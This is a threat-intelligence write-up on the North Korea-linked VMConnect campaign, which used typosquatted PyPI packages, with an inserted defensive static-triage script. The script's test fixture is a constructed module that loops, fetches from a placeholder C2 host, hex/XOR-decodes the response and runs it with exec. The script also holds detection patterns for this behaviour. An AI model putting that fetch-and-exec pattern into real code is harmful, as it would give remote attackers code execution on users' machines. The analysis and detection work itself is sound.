North Korean state-sponsored hackers [1] [2] [3] [4] [5] [6], known as Labyrinth Chollima [5] [6], have been identified as the perpetrators behind the VMConnect campaign [5]. This campaign involved uploading malicious packages to the Python Package Index (PyPI) repository [3], targeting IT professionals seeking virtualization tools [5].

Description

The VMConnect campaign utilized the PyPI repository to distribute malicious packages, with one package mimicking the VMware vSphere connector module vConnector [5]. These packages were eventually removed from PyPI after being downloaded 237 times [5]. ReversingLabs [5], a software supply chain security company [5], discovered additional packages associated with the VMConnect operation [5], including ‘tablediter’ (736 downloads), ‘request-plus’ (43 downloads) [5], and ‘requestspro’ (341 downloads) [5]. These packages impersonated popular software projects and had minimal differences in file structure and content compared to the originals.

The tablediter package contained code that mimicked the popular prettytable tool [3]. When executed [3], it contacted a command-and-control server and attempted to download additional commands [3]. To avoid detection, the package used XOR encryption and hex encoding instead of Base64 encoding [3]. It also ran an endless execution loop, periodically polling a remote server to retrieve and execute a Base64-encoded payload [1] [2] [4]. The exact nature of this payload is still unknown. The tablediter package evaded detection by security software by deferring its malicious behaviour until the package was imported and its functions were called [1] [2] [4].

Similarly, the request-plus and requestspro packages targeted the requests HTTP library [3]. These packages impersonated the legitimate requests package and communicated with a command-and-control server [3]. They collected information about the infected machine and transmitted it to the server [1] [2] [4]. In response, the server provided a token, which the infected host sent back to a different URL on the same server [1] [2] [4] [6]. This URL was used to receive a double-encoded Python module and a download URL [1] [2] [4] [6]. It is suspected that the decoded module downloaded the next stage of the malware [1] [2] [4].
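The three behaviours described above (lookalike names with near-identical file structure, hex/XOR decoding in place of Base64, and an endless polling loop that decodes and executes what a server returns) can all be checked for statically before a package is ever imported. The script below is an added example written for this write-up; it is not ReversingLabs' tooling, and its thresholds, indicator names and the two embedded module sources are constructed for illustration. It compares a package name against a short list of popular projects with difflib, then walks each module's AST for network calls, hex/Base64 decoding, XOR arithmetic, `while True` loops and `exec`/`eval`, and combines those into a verdict.

```python
"""Static triage of a PyPI package for the indicators described in the VMConnect
reporting. Added example; heuristics and fixtures are this script's own."""
import ast
import difflib

# Popular projects the campaign impersonated (from the write-up) plus urllib3 as
# an extra entry a triage list would normally carry.
POPULAR = ["requests", "prettytable", "vconnector", "urllib3"]
NETWORK_PREFIXES = ("requests.", "urllib.", "socket.", "http.client.")
BARE_NETWORK = {"urlopen", "create_connection"}
DECODE_CALLS = {"fromhex", "unhexlify", "b64decode"}
EXEC_CALLS = {"exec", "eval"}


def lookalike_names(name, candidates=POPULAR, threshold=0.65):
    """Popular names the package name resembles (threshold is an assumption)."""
    name = name.lower().replace("_", "-")
    return [c for c in candidates
            if name != c and difflib.SequenceMatcher(None, name, c).ratio() >= threshold]


def _dotted(node):
    """'requests.get' for an attribute chain rooted in a Name, '' otherwise."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def scan_source(source):
    """Sorted list of indicator tags found in one module's source."""
    tags = set()
    for stmt in ast.parse(source).body:
        # Anything outside a def/class body runs as soon as the module is imported.
        import_time = not isinstance(stmt, (ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef))
        for node in ast.walk(stmt):
            if isinstance(node, ast.Call):
                dotted = _dotted(node.func)
                if dotted.startswith(NETWORK_PREFIXES) or dotted in BARE_NETWORK:
                    tags.add("network_at_import" if import_time else "network_call")
                if dotted.rsplit(".", 1)[-1] in DECODE_CALLS:
                    tags.add("decode:" + dotted.rsplit(".", 1)[-1])
                if dotted in EXEC_CALLS:
                    tags.add("dynamic_exec")
            elif isinstance(node, ast.BinOp) and isinstance(node.op, ast.BitXor):
                tags.add("xor_arith")
            elif isinstance(node, ast.While) and isinstance(node.test, ast.Constant) \
                    and node.test.value is True:
                tags.add("infinite_loop")
    return sorted(tags)


def triage_package(name, modules):
    """Combine the name check and per-module tags into a verdict; the rules are
    this example's own heuristics, not a published scoring scheme."""
    report = {"lookalike": lookalike_names(name), "modules": {}, "reasons": []}
    for fname, src in modules.items():
        tags = scan_source(src)
        report["modules"][fname] = tags
        if "network_at_import" in tags:
            report["reasons"].append(f"{fname}: contacts the network on import")
        if "dynamic_exec" in tags and any(t.startswith("decode:") for t in tags):
            report["reasons"].append(f"{fname}: decodes data and executes it")
        if "infinite_loop" in tags and "network_call" in tags:
            report["reasons"].append(f"{fname}: endless loop with network polling")
    if report["lookalike"]:
        report["reasons"].append("name resembles " + ", ".join(report["lookalike"]))
    report["verdict"] = "suspicious" if report["reasons"] else "no indicators"
    return report


# Constructed fixtures (not code from the real packages). The first follows the
# shape the write-up describes: fetch, hex-decode, XOR, execute, repeat; the
# placeholder host uses the reserved .invalid TLD.
SUSPECT_INIT = '''
from urllib.request import urlopen

def _fetch():
    return urlopen("http://c2.invalid/cmd").read()

def loop():
    while True:
        raw = bytes.fromhex(_fetch().decode())
        code = bytes(b ^ 0x2a for b in raw).decode()
        exec(code)
'''
BENIGN_INIT = '''
class Table:
    def __init__(self):
        self.rows = []
    def add_row(self, row):
        self.rows.append(list(row))
    def render(self):
        return str(self.rows)
'''

if __name__ == "__main__":
    print(triage_package("requestspro", {"__init__.py": SUSPECT_INIT}))
    print(triage_package("tablediter", {"__init__.py": BENIGN_INIT}))
```

Note that the name check alone does not flag `tablediter` against `prettytable`, which matches the reporting: that package copied prettytable's code rather than its name, so the AST indicators, not the name distance, are what surface it. In practice this kind of check belongs in a pre-install gate (a private index mirror or a CI step that unpacks the sdist or wheel), since the campaign's packages deliberately did nothing until imported.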

The VMConnect package was linked to the pyQRcode package [6], which had similar malicious functionality [6]. Attacks on macOS systems involved the deployment of JokerSpy [6], a backdoor discovered in June 2023 [6]. Another piece of malware [6], QRLog [6], shared functionality with pyQRcode and referenced the domain www.git-hub[.]me [6], which was also associated with JokerSpy infections. QRLog is believed to be the work of the Labyrinth Chollima sub-cluster within the Lazarus Group [6].

Conclusion

The VMConnect campaign highlights the sophisticated tactics employed by state-sponsored hackers to target IT professionals seeking virtualization tools. The use of impersonation and evasion techniques, such as mimicking popular software projects and deferring malicious execution until the package is imported, demonstrates the need for robust security measures. The discovery of additional packages associated with the VMConnect operation raises concerns about the extent of the campaign’s reach and potential future implications. It is crucial for organizations and individuals to remain vigilant and implement effective security measures to mitigate the risks posed by such attacks.

References

[1] https://patabook.com/technology/2023/08/31/north-korean-hackers-deploy-new-malicious-python-packages-in-pypi-repository/
[2] https://www.redpacketsecurity.com/north-korean-hackers-deploy-new-malicious-python-packages-in-pypi-repository/
[3] https://securityboulevard.com/2023/08/vmconnect-supply-chain-attack-continues-evidence-points-to-north-korea/
[4] https://thehackernews.com/2023/08/north-korean-hackers-deploy-new.html
[5] https://hightechnews.org/north-korean-hackers-behind-malicious-vmconnect-pypi-marketing-campaign/
[6] https://vulners.com/thn/THN:5B82D5B2657D110191B328DC3B213B8B